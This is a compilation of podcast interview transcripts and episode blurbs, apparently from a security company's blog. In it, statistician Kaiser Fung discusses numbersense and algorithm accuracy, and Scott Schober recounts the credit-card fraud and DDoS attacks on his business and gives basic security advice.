Kaiser Fung: Well, I'm mainly working on various educational activities that are hoping to train the next generation of analysts and people who look at data that will hopefully have...the Numbersense that I want to talk about. I have various book projects in mind which I hope to get to when I have more time. And from the Numbersense perspective, I'm interested in exploring ways to describe this in a more concrete way, right? So there this notion of...I mean, this is a general ecosystem of things that I've talked about. But I want a system that ties it a bit. And so I have an effort ongoing to try to make it more quantifiable.
Cindy Ng: And so if people want to follow what you're doing, what is your Twitter handle on your website?
Kaiser Fung: Yes, so my Twitter is @junkcharts. And that's probably where most of my, like in terms of updates that's where things go. I have a personal website called just kaiserfung.com where they can learn more about what I do. And then I try to update my speaking schedule there because I do travel around the country, speak at various events. And then they will also read about other things that I do like for corporations that are mostly around, again, training managers, training people in this area of statistical reasoning, data visualization, number sense and all that.
It’s great to be Amazon to only have one on-call security engineer and have security automated. However, for many organizations today, having security completely automated is still an aspirational goal. Those in healthcare might would love to upgrade, but what if you’re using a system that’s FDA approved, which makes upgrading a little more difficult. What if hackers were able to download personal data from a web server because many weren’t up-to-date and had outdated plugins. Meanwhile, here’s a lesson from veteran report, Brian Krebs on how not to acknowledge a data breach.
By the way, would you ever use public wifi and do you value certificates over experience?
In part oneof our interview with Kaiser, he taught us the importance of looking at the process behind a numerical finding.
We continue the conversation by discussing the accuracy of statistics and algorithms. With examples such as shoe recommendations and movie ratings, you’ll learn where algorithms fall short.
Kaiser, do you think algorithms are the answer. And when you’re looking at a numerical finding, how do you know what questions to ask?
Kaiser Fung: So I think...I mean, they are obviously a big pile of questions that you ask but I think that the most important question not asked out there is the question of accuracy. And I've always been strucken, I keep mentioning to my blog readers this, is that if you open up any of the articles that are written up, whether the it's the New York Times, Wall Street Journal, you know all these papers have big data articles and they talk about algorithms, they talk about predictive models and so on. But you can never find a quantified statement about the accuracy of these algorithms.
They would all qualitatively tell you that they are all amazing and wonderful. And really it all starts with understanding accuracy. And in the Numbersense book, I addressed this with the target example of the tendency models. But also in my previous book, I talk in the whole thing around steroids and also lie detector testing, because it's all kind of the same type of framework. It's really all about understanding the multiple different ways of measuring accuracy. So starting with understanding false positive and false negative. But really they are all derived with other more useful metrics. And you'll be shocked how badly these algorithms are.
I mean it's not that...like for a statistical perspective, they are pretty good. I mean, I try to explain to people, too. It's not that we're all kind of snake oil artist that we...these algorithms do not work at all. I mean, usually, they work if you were to compare with not using the algorithm at all. So you actually have incremental improvements and sometimes pretty good improvements over the case of not using an algorithm.
Now, however, if the case of not using the algorithm leads to, let's say 10% accuracy, and now we have 30% accuracy, you would be three times better. However, 30% accuracy still means that 70% of the time you got the wrong thing, right? So there's an absolute versus relative measurement here that's important. So once you get into that whole area, it's very fascinating. It's because usually the algorithms also do not really make decisions and they are specific decision rules that are in place because often times the algorithms only calculate a probability of something.
So by analogy, the algorithm might tell you that there's a 40% chance of raining tomorrow. But somebody has to create a decision rule that says that, you know, based on...I mean, I'm going to carry umbrella if it's over 60%...So there's all these other stuff involved. And then you have to also understand the soft side of it which is the incentive of the various parties to either go one or the other way. And the algorithm ultimately reflects the designer's because the algorithm will not make that determination of whether you should bring an umbrella since … however, it's over 60% or under 60%. All it can tell you is that for today it's 40%.
So I think this notion that the algorithm itself is running on its own, it's false anyway. And then so once you have human input into these algorithms, then you have to also have to wonder about what the humans are doing. And I think in a lot of these books, I try to point out that what also complicates it is that in every case, including the case of Target, there will be different people coming from this in angles where they are trying to optimize objectives that are conflicting.
That's the beginning of this...that sort of asking the question of the output. And I think if we start doing that more, we can avoid some of this, I think a very reticent current situation that runs into our conversation here is this whole collapse of this…company. I'm not sure if you guys have been following that.
Well, it's an example of somebody who's been solving this algorithm people have been asking. Well, a lot of people have not been asking for quantifiable results. The people have been asking for quantifiable results have been basically pushed back and, you know, they refused all the time to present anything. And then, at this point, I think it's been acknowledged that it's all...you know, empty, it's hot air.
Andy Green: Right, yeah. You had some funny comments on, I think it was on your blog about, and this is related to these algorithms, about I guess buying shoes on the web. On, I don't know, one of the website. And you were always saying, "Well," they were coming up with some recommendations for other types of items that they thought you would be interested in. And what you really wanted was to go into the website and at least, when you went to buy the shoe, they would take you right to the shoe size that you ordered in the past or the color that you ordered.
Kaiser Fung: Right, right, yes.
Andy Green: And it would be that the simple obvious thing to do, instead of trying to come up with an algorithm to figure out what you might like and making suggestions...
Kaiser Fung: Yeah. So I think there are many ways to think about that. Part of it is it's that often times the most unsexy problems are the most impactful. But people tend to focus on the most sexy problems. So in that particular case, I mean the whole article was about that the idea is that what makes prediction inaccurate is not just the algorithm being bad...well I mean the algorithms are often times actually, are not bad. It is that the underlying phenomenon that you are predicting is highly variable.
So I love to use examples like movies since movie ratings was really big some time ago. So how you rate a movie is not some kind of constant. It depends on the mood, it depends on what you did. It depends on who you are with. It depends on so many things. And you hear the same person in movies and under different settings, you probably gave different ratings. So in that sense, it is very difficult for an algorithm to really predict how you're going to rate the movie. But what I was pointing out is that there are a lot of other types of things that these things could...the algorithms could predict that have essentially, I call invariable nature of property.
And a great example of that is the fact that almost always, I mean it's like it's still not a hundred percent but 90% of the time you're buying stuff for yourself, therefore, you have certain shirt sizes, shoe sizes and so on. And therefore it would seem reasonable that they should just show you the things that is appropriate for you. And that's a...it's not a very sexy type of prediction. But it is a kind of prediction. And there are many, many other situations like that, you know. It's like if you just think about just even using an email software, there are certain things that you click on there… it's because the way it's designed is not quite the way you use it. So we have all the data available, they're measuring all this behavior, it could very well be predicted.
So I feel like everybody who has done the same with the clicks every time because they're very much like, "Well, I just say what I mean."
Recently in the security space, there’s been a spate of contradicting priorities. For instance, a recent study showed that programmers will take the easy way out and not implement proper password security. Antidotally, a security pro in a networking and security course noticed another attendee who covered his webcam, but noticeably had his bitlocker recovery code is printed on a label attached to his screen. When protocols and skills compete for our attention, ironically, security gets placed on easy mode. In the real word, when attackers can potentially create malware that would automatically add “realistic, malignant-seeming growths to CT or MRI scans before radiologists and doctors examine them.” How about that time when ethical hackers were able to access a university’s student and staff personal data, finance systems and research networks? Perhaps more education and awareness might be needed to take security out of easy mode and bring it in real-time alerting mode.
In the business world, if we’re looking for actionable insights, many think it's found using an algorithm.
However, statistician Kaiser Fung disagrees. With degrees in engineering, statistics, and an MBA from Harvard, Fung believes that both algorithms and humans are needed, as the sum is greater than its individual parts.
Moreover, the worldview he suggests one should cultivate is numbersense. How? When presented with a numerical finding, go the extra mile and investigate the methodology, biases, and sources.
For more tips, listen to part one of our interview with Kaiser as he uses recent headlines to dissect the problems with how data is analyzed and presented to the general public.
Cindy Ng: Numbersense essentially teaches us how to make simple sense out of complex statistics. However, statistician Kaiser Fung said that cultivating numbersense isn’t something you can learn in a book. But there are three things you can do. First is you shouldn’t take published data as face value. Second, is to know what questions to ask. And third is to have a nose for doctored statistics.
And so, the first bullet is you shouldn't take published data at face value. And so like to me, that means it takes more time to get to the truth that matters, to the matter, to the issue at hand. And I'm wondering also like to what extent does the volume of data, big data, affects fidelity because that certainly affects your final result?
Kaiser Fung: There are lots of aspects to this. I would say, let's start with the idea that, well it's kind of a hopeless situation because you pretty much have to replicate everything or check everything that somebody has done in order to decide whether you want to believe the work or not. I would say, well, in a way that's true but then over time you develop kind of a shortcut. Then part of it is that if you have done your homework on one type of study, then you could apply all the lessons very easily to a different study that we don't have to actually repeat all that.
And also organizations and research groups tend to favors certain types of methodologies. So once you've understood what they are actually doing and what are the assumptions behind the methodologies, then you could...you know, you have developed some idea about whether if you're a believer in the assumptions or their method. Also the time, you know I have certain people who's work I have come to appreciate. I've studied their work, they share some of my own beliefs about how do you read data and how to analyze data.
And it's this sense of, it also depends on who is publishing the work. So, I think that's part one of the question is encourage people to not just take what you're told but to really think about what you're being told. So there are some shortcuts to that over time. Going back to your other issue related to the volume of data, I mean I think that is really causing a lot of issues. And it's not just the volume of data but the fact that the data today is not collected with any design or plan in mind. And often times, the people collecting the data is really divorced from any kind of business problem or divorce from the business side of the host. And the data has just been collected and now people are trying to make sense of it. And I think you end up with many challenges.
One big challenge is you don't end up solving any problems of interest. So I just had a read up my blog, that will be something just like this weekend. And this is related to somebody's analysis of the...I think this is Tour de France data. And there was this whole thing about, "Well, nowadays we have Garmin and we have all these devices, they're collecting a lot of data about these cyclists. And there's nothing much done in terms of analysis," they say.
So which is probably true because again, all of that data has been collected with no particular design in mind or problem in mind. So what do they do? Well, they basically then say, "Well, I'm going to analyze the color of the bike that have actually won the Tour de France over the years." But then that's kind of the state of the world that we're in. We have the data then we try to portrait it by forcing it answer some questions that we’re supposed to create.
And often times these questions are actually very silly and doesn't really solve any real problems, like the color of the bike is. I don't think anyone believe it impacts whether you win or not.
I mean, that's just an example of the types of problems that we end up solving. And many of them are very trivial. And I think the reason why we are there is that when you just collect the data like that, you know, let's say you have a lot of this data about...I mean, let's assume that this data measures how fast the wheels are turning, the speed of your bike, you know, all that type of stuff. I mean, if the problem is that when you don't have an actual problem in mind, you don't actually have all of the pieces of the data that you need to solve a problem. And most often what you don't have is like an outcome metric.
You have a lot of these sort of expensive data but there's no measurement of that thing that you want to impact. And then in order to do that, you have to actually merge in a lot of data or try to collect data from other sources. And you probably often times cannot find appropriate data so you're kind of stuck in this loop of not having any ability to do anything. So I think it's the paradox of the big data age is we have all these data but it is almost impossible to make it useful in a lot of cases. there are many other reasons why the volume of data is not helping us. But I think...what flashed in my head right now because of … is that one of the biggest issues is that the data is not solving any important problems.
Andy Green: Kaiser, so getting back to what you said earlier about not sort of accepting what you're told, and I'm also now become a big fan of your blog, Junk Charts. And there was one, I think it's pretty recent, you commented on a New York Times article on CEO executives, CEO pay.
And then you actually sort of looked a little deeper into it and you came to sort of an opposite conclusion. In fact, can you just talk about that a little bit because the whole approach there is kind of having to do with Numbersense?
Kaiser Fung: Yeah. So basically what happened was there was this big headline about CEO pay. And it was one of these sort of is counter-intuitive headlines that basically said, "Hey, surprise..." Sort of a surprise, CEO pay has dropped. And it even gives a particular percentage and I can't remember what it was in the headline. And I think the sort of Numbersense part of this is that like when I read something like that, because it's sort of like the...for certain topics like this particular topic since I have an MBA and I've been exposed to this type of analysis, so I kind of have some idea, though it's some preconceived notion in my head about where CEO pay is going. And so it kind of triggers a bit of a doubt in my head.
So then what you want to do in these cases, and often times, I think this is an example of very simple things you can do, If you just click on the link that is in the article and go to the original article and start reading what they say, and in this particular case, you actually only need to read like literally the first two bullet points of the executive summary of the report. Because then immediately you'll notice that actually CEO pay has actually gone up, not down. And it all depends on what metric people use it.
And that they're both actually accurate from a statistic perspective. So, the metric that went up was the median pay. So the middle person. And then the number that went down was the average pay. And then here you basically need a little bit of statistical briefing because you have to realize that CEO pay is an extremely skewed number. Even at the very top, I think they only talk about the top 200 CEOs, even the very top the top person is making something like twice the second person. Like, this is very, very steep curve. So the average is really meaningless in this particular case and the median is really the way to go.
And so, you know, I basically blogged about it and say, you know, that that's a really poor choice of a headline because it doesn't represent the real picture of what is actually going on. So that's the story. I mean, that's a great...yes, so that's a great example of what I like to tell people. In order to get to that level of reasoning, you don't really need to take a lot of math classes, you don't need to know calculus, you know...I think it's sort of the misnomer perpetuated by many, many decades of college instruction that statistics is all about math and you have to learn all these formulas in order to go anywhere.
Andy Green: Right. Now, I love the explanation. And also, it seems that if the Times had just shown a bar chart and it would have been a little difficult but what you're saying is that at the upper end, there are CEOs making a lot of money and that they just dropped a little bit. And correct me if I'm wrong, but everyone else did better, or most like 80% of the CEOs or whatever the percentile is, did better. But those at the top, because they're making so much, lost a little bit and that sort of dropped the average. But meanwhile, if you polled CEOs, whatever the numbers, 80% or 90% would say, "Yes, my pay has gone up."
Kaiser Fung: Right. So yeah. So I did look at the exact numbers there. I don't remember what those numbers are but in conceptually speaking, given this type of distribution, it's possible that just the very top guy having dropped by a bit will be sufficient to make the average move. So the concept that the median is the middle guy has actually moved up. So what that implies is that the bulk, you know, the weight of the distribution has actually gone up.
There are many different actual numbers that made this in levels of aspect that you can talk about. That's the first level of getting the idea that you rarely talk in the median. And if you really want to dig deeper, which I did in my blog post, is that you also have to think about what components drive the CEO pay, because if the accounting, not just the fixed-base salary but maybe also bonuses and also maybe they even price in any of the stock components and you know the stock components are going to be much more volatile.
I mean it all points to the fact that you really shouldn't be looking at the averages because it's now so affected by all these other ups and downs. So to me, it's a basic level of statistical reasoning that unfortunately hasn't seem to have improved in the journalistic world. I mean, even in this day and age when there's so much data, they really need to improve their ability to draw conclusions. I mean,...that's a pretty simple example of something that can be improved. Now we also have a lot of examples of things that are much more subtle.
I'd like to give an example, a different example of this, and it also comes from something that showed up in the New York Times some years ago. But this is a very simple scatter plot that was plotting or trying to explain or trying to correlate the average happiness of people in different countries. And that's typically measured by survey results. So you base your happiness from a scale of zero to ten or stuff like that. And then they want to correlate that with the what they call the progressiveness of the tax system in each of these countries.
So,the thing that people don't understand is by making this scatter plot, you have actually imposed upon your reader a particular model of the data. And in this particular case, it is the model that says that happiness can be explained by just one factor which is the tax system. So in reality, they are a gazillion other factors that affects somebody's happiness. And you really...and if you know anything about statistics, we would learn that it multivariable regression which would actually control all the other factors. But when you do a scatter plot, you haven't adjusted for anything else. So it's like the very simple analysis could be extremely misleading.
Should CISOs use events or scenarios to drive security, not checklists? It also doesn’t matter how much you spend on cybersecurity if ends up becoming shelfware. Navigating one’s role as a CISO is no easy feat. Luckily, the path to becoming a seasoned CISO is now easier with practical classes and interviews. But when cybersecurity is assumed to not be not very important. Does that defeat the leadership role of a CISO?
Panelists: Cindy Ng, Sean Campbell, Mike Buckbee, Kris Keyser
Scott Schober wears many hats. He's an inventor, software engineer, and runs his own wireless security company. He's also written Hacked Again, which tells about his long running battle against cyber thieves. Scott has appeared on Bloomberg TV, Good Morning America, CNBC, and CNN.
We continue our discussion with Scott. In this segment, he talks about the importance of layers of security to reduce the risks of an attack. Scott also points out that we should be careful about revealing personal information online. It's a lesson he learned directly from legendary hacker Kevin Mitnick!
Scott Schober: Absolutely. I mean, to your point, can cell phones be attacked? Absolutely. That's actually where most of the hackers are starting to migrate their attacks toward a cell phone. And why is that, especially they're aiming at Android environment. Excuse me. It's open-source. Applications are not vetted as well. Everybody is prone to hacking and vulnerable. There are more Android users. You've got open-source, which is ideal for creating all kinds of malicious viruses, ransomware, DDoS, whatever you want to create and launch. So that's their preferred method, the easiest path to get it in there, but Apple certainly is not prone to that.
The other thing is that mobile phone users are not updating the security patches as often as they should. And that becomes problematic. It's not everybody, but a good portion of people are just complacent. And therefore hackers know that eventually, everybody's old Windows PC will be either abandoned or upgraded with more current stuff. So they'll target the guys that are still using old Windows XP machines where there's no security updates and they're extremely vulnerable, until that dries up. Then they're gonna start migrating over to mobile devices...tablets, mobile phones...and really heavily increase the hacks there. And then keep in mind why. Where are you banking? Traditionally everybody banked at a physical bank or from their computer. Now everybody's starting to do mobile banking from their device...their phone. So where are they gonna go if they want to compromise your credit card or your banking account? It's your mobile device. Perfect target.
Andy Green: Yeah. I think I was reading on your blog that, I think, your first preference is to pay cash as a consumer.
Scott Schober: Yes. Yes. Yep.
Andy Green: And then I think you mentioned using your iPhone next. Is that, did I get that right?
Scott Schober: Yeah, you could certainly..."Cash is king," I always say. And minimize. I do...I probably shouldn't say it...but I do have one credit card that I do use and monitor very carefully, that I try to use only at secure spots where I know. In other words, I don't go to any gas station to get gas and I don't use it for general things, eating out. As much as I can use cash, I will, to minimize my digital footprint and putting my credit out there too much. And I also watch closely, if I do hand somebody my credit card, I write on the back of it, "Must check ID." And people sometimes...not always...but they'll say, "Can I see your ID?" Hand them my license. "Thank you very much." Little things like that go a long way in preventing somebody, especially if you're handing your credit card to somebody that's about to swipe it through a little square and steal your card info. When they see that, they realize, "Oh, gosh, this guy must monitor his statement quickly. He's asking for ID. I'm not gonna try to take his card number here." So those little tips go a long, long way.
Andy Green: Interesting. Okay. So in the second half of the "Hacked Again" book, you give a lot of advice on, sort of, security measures that companies can take and it's a lot of tips that, you know, we recommend at Varonis. And that includes strong passwords. I think you mentioned strong authentication. Pen testing may have come up in the book as well. So have you implemented this at your company, some of these ideas?
Scott Schober: Yes, absolutely. And again, I think in the book I describe it as "layers of security," and I often relate that to something that we physically can all relate to, and that's our house. We don't have, typically, a single lock on our front door. We've got a deadbolt. We've got a camera. We've got alarm stickers, the whole gamut. The more we have our defenses up, the more likely that a physical thief will go next door or down the block to rob us. The same is true in cyber-security. Layered security, so not just when we have our login credentials. It's our user name and a password. It's a long and strong password, which most people are starting to get, although they're not all implementing. We never reuse the same password or parts of a password on multiple sites because password reuse is a huge problem still. More than half the people still reuse their password, even though they hear how bad it is because we're all lazy. And having that additional layer, multi-factor authentication or two-factor authentication. That additional layer of security, be it when you're logging into your Gmail account or whatever and have a text go your phone with a one-time code that will disappear. That's very valuable.
Messaging apps, since we deal a lot with the surveillance community and understanding how easy it is to look at content. For anything that is very secure, I will look at messaging apps. And what I look for in there is something like...The one I've been playing with and I have actually on my phone is Squealock. There, you do not have to provide your actual mobile phone number. Instead, you create a unique ID and you tell other people that you wanna text to and talk to, "Here's my ID." So nobody ever actually has your mobile phone number because once you give out your mobile phone number, you give away pieces of information about you. So I really strongly encourage people, think before they put too much information out. Before you give your phone number away. Before you give your Social Security number away if you're going to a doctor's office. Are you required to do that? The answer is no, you're not required to, and they cannot deny you treatment if you don't give them a Social Security number.
Andy Green: Interesting. Yeah.
Scott Schober: But yet everybody gives it.
Scott Schober: So think very carefully before you give away these little tidbits that add up to something very quickly, because that could be catastrophic. I was at an event speaking two weeks ago down in Virginia, Norfolk, cyber-security convention, and one of the keynotes, they invited me up and asked if I'd be willing to see how easy it is to perform identity theft and compromise information on myself. I was a little reluctant, but I said, "Okay, everything else is out there," and I know how easy it is to get somebody's stuff, so I was the guinea pig, and it was, Kevin Mitnick performed. This is the world's most famous hacker, so it made it very interesting.
Andy Green: Yes.
Scott Schober: And within 30 seconds and at the cost of $1, he pulled up my Social Security number.
Andy Green: Right. It's astonishing.
Scott Schober: Scary. Scary. Scary.
Andy Green: Yep, very scary. Yeah...
Scott Schober: And any hacker can do that. That's the part that is kinda depressing, I think. So even though you could be so careful, if somebody really wants anything bad enough, there is a way to do it. So you wanna just put up your best defenses to minimize and hopefully they move on to the next person.
Andy Green: Right. Yeah, I mean, we've seen hackers, or on the blog, we've written about how hackers are quite good at sort of doing initial hacks to get sort of basic information and then sort of build on that. They end up building really strong profiles. And we see some of this in the phishing attacks, where they seem to know a lot about you, and they make these phish mails quite clickable because it seems so personalized.
Scott Schober: It can be very convincing. Yes.
Andy Green: Very convincing. So there's a lot out there already on people. I was wondering, do you have any advice...? We're sort of pro-pen testing at Varonis. We just think it's very useful in terms of assessing real-world risks. Is that something...can you recommend that for small, medium businesses, or is that something that may be outside their comfort zone?
Scott Schober: No, I do have to say, on a case-by-case basis, I always ask business owners to do this first. I say, "Before you jump out and get vulnerability assessment or pen testing, both of which I do normally recommend, analyze what value you have within your walls of your company." Again, like you mentioned earlier, good point, are you storing customer information? Credit card information? Account numbers? Okay, then you have something very valuable, not necessarily just to your business, but to your customers. You need to make sure you protect that properly. So how do you protect that properly, is by knowing where your vulnerabilities are for a bad guy to get in. That is very, very important. What pen tests and vulnerability assessments reveal are things that your traditional IT staff will not know. Or in a very small business, they won't even think of these things. They don't think about maybe updating, you know, your security patches on WordPress for your website or, you know, other basic things. Having the world's most long and strong password for your wireless access point. "Well, it's only my employees use it." That's what they think. But guess what? A hacker pulls into your lot after hours and they're gonna try some automated software that's gonna try to socially pull off the internet everything and anything about you and your company in case part of that is part of your password. And guess what? They have a high success ratio with some of these automatic programs to guess passwords. That is very scary to me. Or they may use social engineering techniques to try to get some of that information out of a disgruntled employee or an innocent secretary or whatever...we've all heard these extreme stories...to get into your computer networks and place malware on there. So that's how you really find out. You get an honest appraisal of how secure your company is. Yeah, we did it here. I was honestly surprised when I thought, "Wow, we've got everything covered." And then I was like, "What? We never would have thought of that." So there are some gotchas that are revealed afterward. And you know what, if it's embarrassing, who cares? Fix it and secure it and that'll protect your company and your assets.
And again, you gotta think about IP. Some companies...our industry, we've got a lot of intellectual property here, that over 44 years as a company, that's our secret sauce. We don't want that ending up in other international markets where it could be used in a competitive area. So how do you protect that, is making sure your company is very, very secure. Not just physical security, because that is extremely important. That goes hand in hand. But even keeping your computer network secure. And from the top down, every employee in the organization realizes they're not part of the security problem. They're part of the security solution and they have a vested interest just to make sure that...yeah.
Andy Green: Yeah, no, absolutely. We're on the same page there. So do you have any other final advice for either consumers or businesses on security or credit cards or...?
Scott Schober: Again, I always like to make sure I resonate with people, people have the power to control their own life and still function and still have a relative level of security. They don't have to live in fear and be overly paranoid. Am I paranoid? Yes, because maybe an exceptional number of things keep happening to me and I keep seeing that I'm targeted. I had another email the other day from Anonymous and different threats and crazy things that keep unfolding. That makes you wonder and get scared. But do the things that are in your control. Don't put your head in the sand and get complacent, as most people tend to do. People say, "Well, just about everybody's been compromised. Why bother? It's a matter of time." Well, if you take that attitude, then you will be the next victim. But if you can make it really difficult for those cyber-hackers, at least with a clean conscience, you said, "I made them work at it," and hopefully they'll move on to the next target. And that's what my goal is, to really encourage people, don't give up. Keep trying, and even if it takes a little bit more time, take that time. It's well, well worth it. It's a good investment to protect yourself in the long run.
Andy Green: No, I absolutely agree. Things like two-factor authentication on, let's say, Gmail or some of your other accounts and longer passwords. Just make it a little bit harder so they'll then move on to the next one. Absolutely agree with you.
Scott Schober: Yeah, yeah. That's very true. Very true.
Andy Green: Okay. Thank you so much for your time.
Scott Schober: Oh, no, any time, any time. Thank you for the time. Really appreciate it and stay safe.
Scott Schober wears many hats. He's an inventor, software engineer, and runs his own wireless security company. He's also written Hacked Again, which tells about his long running battle against cyber thieves. Scott has appeared on Bloomberg TV, Good Morning America, CNBC, and CNN.
In the first part of the interview, Scott tells us about some of his adventures in data security. He's been a victim of fraudulent bank transfers and credit card transaction. He's also aroused the wrath of cyber gangs and his company's site was a DDoS target. There are some great security tips here for both small businesses and consumers.
Scott Schober: Yeah, thanks for having me on here.
Andy Green: Yeah, so for me, what was most interesting about your book "Hacked Again," is that hackers actively go after small, medium businesses, and these hacks probably don't get reported in the same way as an attack on, of course, Target or Home Depot. So, I was wondering if you could just talk about some of your early experiences with credit card fraud at your security company?
Scott Schober: Yeah, I'd be happy to. My story, and what I'm finding, too, is not necessarily that different than many other small business owners. What perhaps I'm finding is more different is many small businesses and medium size business owners are somewhat reluctant to share the fact that they actually have had breach within their company. And often times, because they perhaps are embarrassed or maybe there's a brand that they don't wanna have tarnished, they're afraid customers won't come back to the well and purchase products or services from them. In reality... And I talk about this often about breaches, pretty much every week now, trying to educate and share my story with audiences and I always take a poll. And I am amazed, almost, now, everybody raises their hand that they've had some level of having their business compromised or personally compromised be it a debit card or credit card.
So, it's something now that resonates, and a lot more people realize that it's frequent, and it almost becomes commonplace. And another card gets issued, and they have to dispute charges, and write letters, and go through the wonderful procedure that I've had to do. I think, with myself, it's happened more frequently unfortunately because, again, sharing tips and how-to and best practices with individuals, it kinda gets the hackers a little bit annoyed and they like to take on a challenge to see if they could be disruptive or send a message to those that are educating people how to stay safe, because obviously it makes their game a lot harder.
And I'm not alone, I'm in good company with a lot of other security experts out there and in the cyber world that had been targeted. And we all share war stories and we're always got the target on our back, I guess it's safe to say. And with myself, it started with debit card, credit card, then eventually the checking account. Sixty-five thousand dollar was taken out. And I realized this was not just a coincidence. This is a targeted, focused attack against me, and it really hasn't stopped since. I wish I could say it has, but every week I'm surprised with something I find.
Andy Green: Right.
Scott Schober: Very scary. I have to just keep reinforcing what we're doing in making it safer to run our business and protect ourselves and our assets.
Andy Green: Right. So, I was wondering if you had just some basic tips because I know you talked a lot...you had some credit card fraud early on. But some basic advice for companies that are using credit cards or e-commerce. Is there something like an essential tip in terms of dealing with credit card processing?
Scott Schober: Yeah, yeah, absolutely. There's actually a couple things that I always share with people. Number one, a lot of it has to do with how well do you manage your finances, and this is basic 101 finances. When you have a lot of credit cards, it's hard to manage and hard to keep on top of looking at the statements or going online and making sure that there's no fraudulent activity. Regular monitoring of statements is essential. I always emphasize, minimize the number of cards you use. Maybe it's one card that you use, perhaps a second card you use for online purchases. Again, so it could be very quickly isolated and cleaned up if there is a compromise.
It's ironic, the other day I was actually presenting at a cyber security show and I was about to go up on stage and my wife called me in a panic. She has one credit card in her own name that she took out many years ago, and she says, "You won't believe it, my card was compromised. How could this happen?" So here it is, I'm preaching to my own family and she's asking me how it happened. She was all embarrassed and frustrated. It's because if we're not regularly monitoring the statement and not careful where we're shopping, we just increase the odds. It's a numbers game. So, really, minimizing and being very careful where we shop, especially online. If we shop for the best price, the best bargain, oftentimes there will be a site with the cheapest price, that's a telltale sign there's gonna be stolen credit card there. Go to name brand stores online, you have a much, much more successful chance that you're not gonna be compromised with your credit card.
Andy Green: Right. So, that's actually some good advice for consumers, but what about for vendors because as a company, you were taken advantage of. I think I have a note here of $14,000 charge?
Scott Schober: You're exactly right, yes. That's a little different. That particular charge, just to clarify, that was somebody that was purchasing our equipment and provided stolen credit card to purchase equipment. So there the challenge is how do you vet somebody that provides... Somebody that you don't see face-to-face or don't know personally, especially in another country, how do you make sure that that customer's legit? And I've done a couple simple things to do that. In fact, I had one earlier today, I actually did. Number one, pick up the phone and ask a lot of questions, verify that they are who they say they are, what their corporate address is. Make sure you're talking to a person in the accounting department if it's a larger company. Try to vet them and make sure they're legit, go online and see. And there are fake websites and there are fake company profiles and things. But sometimes crisscrossing, you do a quick Google search, go onto LinkedIn and see if you see that same person and their title, what their background. Does it kind of jive with what you're hearing on the phone and what you're reading in the email? It's very, very important. Do your due diligence even if it takes you five or ten extra minutes. You could prevent a breach and save yourself a lot of hassle and a lot of money.
Andy Green: Right. So, would a small business like yours be held liable if you don't do that due diligence, or does the credit card company protect you if you do the due diligence and then there turns out to be a fraudulent charge?
Scott Schober: Great question. Unfortunately, the laws greatly protect the buyer, the consumer. There's a lot less laws in place to protect the business owner. And I found that out the hard way, in some cases, in talking to other business owners. Really hard to get your money back, where the second that there's a dispute, that money comes out of the account and goes into an account between the two parties till it can actually be settled or arbitrated.
And it's usually a series, you each have two shots of writing a letter and trying to show your case, so on and so forth. In a case where I had been given fraudulent stolen credit cards from somebody that actually had a lawnmower shop, in that particular case, the money went out of our account, went into this other account, and I said right away, "Honestly..." I said, "I didn't realize these were fraudulent charges," they immediately went back into the other person's account. So, the person that was compromised fortunately they got their money back and I felt good that small business owner wasn't duped or stuck.
The problem I had was the fact we shipped the goods and almost lost them. So, we got hit with some shipping bills and things like that, but it was more the lesson I learned that was powerful. Spend that time up front, even if cost you a little bit of money, to save the potential that you're receiving a fraudulent charges. The card companies, the credit card companies that accept it, yes, there are some basic checks that they do. If it's in, like the United States, they'll do is a zip code check or address check, very basic.
They really don't validate for you a 100% that that card is not compromised. There's not enough checks and balances in place, or security that can say, "Hey." And really, what does it do, the onerous goes back to you, on the business owner. Your name is at the bottom of it, signed, that they can go after your company or you personally, depending upon what your agreement is. And most of the credit card agreements, they can go after you personally if something fraudulent happens. So really be aware what you sign on with your credit card processor.
Andy Green: Right, right. We talk a lot about what they call the PCI credit card industry DSS, Data Security Standard, which is supposed to put companies that store credit card information at a certain security level. And it's been a little bit controversial or people had issues with the standard, I guess vendors. I was wondering if you had any thoughts on that standard? Is that something that you have implemented or you don't store credit card numbers and it's not an issue for you or...?
Scott Schober: I think it's an issue for everyone because to some degree everybody has credit card storage for a period of time. And be it on premise, be it physical, be it a receipt. What we have done beyond what the standard mandate says, we do shred with micro shredder old documents. So, a customer will call me up a week later, a month later, a year later, and I'm gonna say, "I'm sorry, I need to get your credit card again." We do it over the phone, traditionally. We say, "Do not email us. Do not fax us your credit card," even though many people like to do that, there's risks on many fronts obviously why you should not do that.
A lot of companies also, you have to keep in mind, it's important to realize that they're storing a lot of their information in the cloud. Claim to be secure, claim to be encrypted, it's a remote server. I always ask the question, "Do you know where the physical location of that server is?" And most people say, "No." "Do you realize that there is redundancy and backup of that?" "Well, no." "And do you realize that somewhere in the process that data may not all be encrypted, as they say?" "No, I didn't realize that." So, to me, I'm very, very cautious. What we do use is for online commerce store, none of the employees within my organization ever see the credit card.
And that allows some transparency and, I think, some security. So, you keep it out of our hands, they can buy online. We never are in possession of their physical credit card, or expiration date, or links to their account. And that, I think, is important that you can keep that level of security, and it actually helps customers. I've had a couple customers say, "You know what, you guys do it right. I can just go online and buy it. There's no extra cost or this or that. It's simple to purchase on your store, and I know nobody's holding that credit card." I say, "Great."
Andy Green: Right, and that's a very typical solution to go to a processor like that.
Scott Schober: Exactly.
Andy Green: Although some of them have been hacked, and...
Scott Schober: True, true, that is very true.
Andy Green: But, yeah, that is a very typical solution. And then I... Reading your book, going back to your book, "Hacked Again," there's a series of hacks. I guess it started out sort of with credit cards, but over the years you also experienced a DDoS attack. So, I was wondering if you can tell us a little bit about that. It sounds like one of the earlier ones, and just how you became suspicious and how your ISP responded?
Scott Schober: Yeah, that's an interesting one. And again, I think especially in light of just what happened the other week, a lot more people can understand what in the world that acronym, DDoS means. And we learned it firsthand awhile back, and so the pain of it... Having an online commerce store that in the past few years we've grown... And we'll typically do maybe $40,000 to $50,000 in commerce per month on our online store, so it's an important piece of revenue for a small business. When you start to find that your store is very spotty and having problems, and people cannot buy, and it's not one or two people, but you start getting the phone calls, "Hey, I can't process an order. I can't access your store. I'm being denied. Is there something wrong?" "Gee, that's funny. Let me try. Wait a second, what's wrong. Let's call the ISP, let's call..." And we started digging in and finding out there's waves of periods over a time that we've been out. None of these were prolonged, wasn't like we were out for an entire week. There's short burst of an hour at a time, perhaps, that we've been out.
